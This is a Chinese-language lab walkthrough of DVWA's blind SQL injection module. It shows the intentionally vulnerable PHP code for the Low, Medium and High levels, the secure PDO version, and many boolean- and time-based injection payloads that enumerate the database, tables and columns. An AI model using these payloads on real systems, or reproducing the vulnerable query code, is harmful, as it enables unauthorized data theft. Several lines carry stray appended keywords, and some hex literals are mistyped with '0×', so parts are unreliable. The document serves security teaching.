SQL Injection(Blind),即SQL盲注,與通常注入的區別在於,通常的注入攻擊者能夠直接從頁面上看到注入語句的執行結果,而盲注時攻擊者一般是沒法從顯示頁面上獲取執行結果,甚至連注入語句是否執行都無從得知,所以盲注的難度要比通常注入高。目前網絡上現存的SQL注入漏洞大可能是SQL盲注。php
手工盲注思路前端
手工盲注的過程,就像你與一個機器人聊天,這個機器人知道的不少,但只會回答「是」或者「不是」,所以你須要詢問它這樣的問題,例如「數據庫名字的第一個字母是否是a啊?」,經過這種機械的詢問,最終得到你想要的數據。mysql
盲注分爲基於布爾的盲注、基於時間的盲注以及基於報錯的盲注,這裏因爲實驗環境的限制,只演示基於布爾的盲注與基於時間的盲注。sql
下面簡要介紹手工盲注的步驟(可與以前的手工注入做比較):數據庫
1.判斷是否存在注入,注入是字符型仍是數字型 2.猜解當前數據庫名 3.猜解數據庫中的表名 4.猜解表中的字段名 5.猜解數據
再介紹一下盲注中經常使用的幾個函數:安全
substr()
count()
ascii()
length()
left()
下面對四種級別的代碼進行分析。服務器
Low Security Levelcookie
<?php if( isset( $_GET[ 'Submit' ] ) ) { // Get input $id = $_GET[ 'id' ]; // Check database $getid = "SELECT first_name, last_name FROM users WHERE user_id = '$id';"; $result = mysqli_query($GLOBALS["___mysqli_ston"], $getid ); // Removed 'or die' to suppress mysql errors // Get results $num = @mysqli_num_rows( $result ); // The '@' character suppresses errors if( $num > 0 ) { // Feedback for end user echo '<pre>User ID exists in the database.</pre>'; } else { // User wasn't found, so the page wasn't! header( $_SERVER[ 'SERVER_PROTOCOL' ] . ' 404 Not Found' ); // Feedback for end user echo '<pre>User ID is MISSING from the database.</pre>'; } ((is_null($___mysqli_res = mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : $___mysqli_res); } ?>
payload網絡
1 1' 1' or 1=1# 1' or 1=2#
判斷爲盲注以後,進行數據庫猜解:session
1' and length(database())=4 #
二分法猜解表:
ASCII 碼對照表
從表中看出,字符中,小寫字母按順序第一位a的ascii碼是97
咱們來進行猜想:
猜數據庫名
1' and ascii(substr(database(),1,1))>97# 頁面返回存在 1' and ascii(substr(database(),1,1))>100# 頁面返回不存在 1' and ascii(substr(database(),1,1))<103# 頁面返回存在 1' and ascii(substr(database(),1,1))<100# 頁面返回不存在
最終發現:數據庫名的第一位字符的ascii
碼值爲 100,則獲得字母d
重複上述步驟,就能夠猜解出完整的數據庫名dvwa
了。
猜表名
1' and (select count(table_name) from information_schema.tables where table_schema=database())=1 # 顯示不存在 1' and (select count(table_name) from information_schema.tables where table_schema=database())=2 # 顯示存在
得知有2
個表,繼續使用length()
函數來猜想表的長度:
1' and length(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1))=1 # 顯示不存在 1' and length(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1))=2 # 顯示不存在 … 1' and length(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1))=9 # 顯示存在
說明第一個表名長度爲9
。
1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))>97 # 顯示存在 1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))<122 # 顯示存在 1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))<109 # 顯示存在 1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))<103 # 顯示不存在 1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))>103 # 顯示不存在
說明第一個表的名字的第一個字符爲小寫字母g。
…
重複上述步驟,便可猜解出兩個表名guestbook
、users
。
猜解表中的字段名
首先猜解表中字段的數量:
1' and (select count(column_name) from information_schema.columns where table_name= 'users')=1 # 顯示不存在 … 1' and (select count(column_name) from information_schema.columns where table_name= 'users')=8 # 顯示存在
說明users
表有8
個字段。
接着挨個猜解字段名:
1' and length(substr((select column_name from information_schema.columns where table_name= 'users' limit 0,1),1))=1 # 顯示不存在 … 1' and length(substr((select column_name from information_schema.columns where table_name= 'users' limit 0,1),1))=7 # 顯示存在
說明users
表的第一個字段爲7
個字符長度。
採用二分法,便可猜解出全部字段名。
猜解數據
一樣採用二分法。
還可使用基於時間的盲注:
1' and sleep(5) #感受到明顯延遲;
1 and sleep(5) #沒有延遲;
說明存在字符型的基於時間的盲注。
首先猜解數據名的長度:
1' and if(length(database())=1,sleep(5),1) # 沒有延遲 1' and if(length(database())=2,sleep(5),1) # 沒有延遲 1' and if(length(database())=3,sleep(5),1) # 沒有延遲 1' and if(length(database())=4,sleep(5),1) # 明顯延遲
說明數據庫名長度爲4
個字符。
接着採用二分法
猜解數據庫名:
1' and if(ascii(substr(database(),1,1))>97,sleep(5),1)# 明顯延遲 … 1' and if(ascii(substr(database(),1,1))<100,sleep(5),1)# 沒有延遲 1' and if(ascii(substr(database(),1,1))>100,sleep(5),1)# 沒有延遲
說明數據庫名的第一個字符爲小寫字母d
。
…
重複上述步驟,便可猜解出數據庫名。
首先猜解數據庫中表的數量:
1' and if((select count(table_name) from information_schema.tables where table_schema=database() )=1,sleep(5),1)# 沒有延遲 1' and if((select count(table_name) from information_schema.tables where table_schema=database() )=2,sleep(5),1)# 明顯延遲
說明數據庫中有兩個表。
接着挨個猜解表名:
1' and if(length(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1))=1,sleep(5),1) # 沒有延遲 … 1' and if(length(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1))=9,sleep(5),1) # 明顯延遲
說明第一個表名的長度爲9
個字符。
採用二分法便可猜解出表名。
首先猜解表中字段的數量:
1' and if((select count(column_name) from information_schema.columns where table_name= ’users’)=1,sleep(5),1)# 沒有延遲 … 1' and if((select count(column_name) from information_schema.columns where table_name= ’users’)=8,sleep(5),1)# 明顯延遲
說明users
表中有8
個字段。
接着挨個猜解字段名:
1' and if(length(substr((select column_name from information_schema.columns where table_name= ’users’ limit 0,1),1))=1,sleep(5),1) # 沒有延遲 … 1' and if(length(substr((select column_name from information_schema.columns where table_name= ’users’ limit 0,1),1))=7,sleep(5),1) # 明顯延遲
說明users
表的第一個字段長度爲7
個字符。
採用二分法便可猜解出各個字段名。
一樣採用二分法。
Medium Security Level
<?php if( isset( $_POST[ 'Submit' ] ) ) { // Get input $id = $_POST[ 'id' ]; $id = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"], $id ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : "")); // Check database $getid = "SELECT first_name, last_name FROM users WHERE user_id = $id;"; $result = mysqli_query($GLOBALS["___mysqli_ston"], $getid ); // Removed 'or die' to suppress mysql errors // Get results $num = @mysqli_num_rows( $result ); // The '@' character suppresses errors if( $num > 0 ) { // Feedback for end user echo '<pre>User ID exists in the database.</pre>'; } else { // Feedback for end user echo '<pre>User ID is MISSING from the database.</pre>'; } //mysql_close(); } ?>
能夠看到,Medium Security Level
的代碼利用mysqli_real_escape_string
函數對特殊符號\x00
,\n
,\r
,\
,’
,」
,\x1a
進行轉義,同時前端頁面設置了下拉選擇表單,但願以此來控制用戶的輸入。
雖然前端使用了下拉選擇菜單,但咱們依然能夠經過抓包改參數id
,提交惡意構造的查詢參數。
以前已經介紹了詳細的盲注流程,這裏就簡要演示幾個。
首先是基於布爾的盲注:
抓包改參數id
爲
1 and length(database())=4 #
顯示存在,說明數據庫名的長度爲4
個字符;
抓包改參數id
爲
1 and length(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1))=9 #
顯示存在,說明數據中的第一個表名長度爲9
個字符;
抓包改參數id
爲
1 and (select count(column_name) from information_schema.columns where table_name= 0×7573657273)=8 #,(0×7573657273 爲 users 的 16 進制)
顯示存在,說明users
表有8
個字段。
而後是基於時間的盲注:
抓包改參數id
爲
1 and if(length(database())=4,sleep(5),1) #
明顯延遲,說明數據庫名的長度爲4
個字符;
抓包改參數id
爲
1 and if(length(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1))=9,sleep(5),1) #
明顯延遲,說明數據中的第一個表名長度爲9
個字符;
抓包改參數id
爲
1 and if((select count(column_name) from information_schema.columns where table_name=0×7573657273 )=8,sleep(5),1) #
明顯延遲,說明users
表有8
個字段。
High Security Level
<?php if( isset( $_COOKIE[ 'id' ] ) ) { // Get input $id = $_COOKIE[ 'id' ]; // Check database $getid = "SELECT first_name, last_name FROM users WHERE user_id = '$id' LIMIT 1;"; $result = mysqli_query($GLOBALS["___mysqli_ston"], $getid ); // Removed 'or die' to suppress mysql errors // Get results $num = @mysqli_num_rows( $result ); // The '@' character suppresses errors if( $num > 0 ) { // Feedback for end user echo '<pre>User ID exists in the database.</pre>'; } else { // Might sleep a random amount if( rand( 0, 5 ) == 3 ) { sleep( rand( 2, 4 ) ); } // User wasn't found, so the page wasn't! header( $_SERVER[ 'SERVER_PROTOCOL' ] . ' 404 Not Found' ); // Feedback for end user echo '<pre>User ID is MISSING from the database.</pre>'; } ((is_null($___mysqli_res = mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : $___mysqli_res); } ?>
能夠看到,High Security Level
的代碼利用cookie
傳遞參數id
,當SQL
查詢結果爲空時,會執行函數sleep(seconds)
,目的是爲了擾亂基於時間的盲注。同時在SQL
查詢語句中添加了LIMIT 1
,但願以此控制只輸出一個結果。
雖然添加了LIMIT 1
,可是咱們能夠經過#
將其註釋掉。但因爲服務器端執行sleep
函數,會使得基於時間盲注的準確性受到影響,這裏咱們只演示基於布爾的盲注:
抓包將cookie
中參數id
改成
1' and length(database())=4#
顯示存在,說明數據庫名的長度爲4
個字符;
抓包將cookies
中參數id
改成
1'and length(substr(( select table_name from information_schema.tables where table_schema=database() limit 0,1),1))=9 #
顯示存在,說明數據中的第一個表名長度爲9
個字符;
抓包將cookie
中參數id
改成
1' and (select count(column_name) from information_schema.columns where table_name=0×7573657273)=8 #,(0×7573657273 爲 users 的 16 進制)
顯示存在,說明uers
表有8
個字段。
Impossible Security Level
<?php if( isset( $_GET[ 'Submit' ] ) ) { // Check Anti-CSRF token checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' ); // Get input $id = $_GET[ 'id' ]; // Was a number entered? if(is_numeric( $id )) { // Check the database $data = $db->prepare( 'SELECT first_name, last_name FROM users WHERE user_id = (:id) LIMIT 1;' ); $data->bindParam( ':id', $id, PDO::PARAM_INT ); $data->execute(); // Get results if( $data->rowCount() == 1 ) { // Feedback for end user echo '<pre>User ID exists in the database.</pre>'; } else { // User wasn't found, so the page wasn't! header( $_SERVER[ 'SERVER_PROTOCOL' ] . ' 404 Not Found' ); // Feedback for end user echo '<pre>User ID is MISSING from the database.</pre>'; } } } // Generate Anti-CSRF token generateSessionToken(); ?>
能夠看到,Impossible Security Level
的代碼採用了PDO
技術,劃清了代碼與數據的界限,有效防護SQL
注入,Anti-CSRF token
機制的加入了進一步提升了安全性。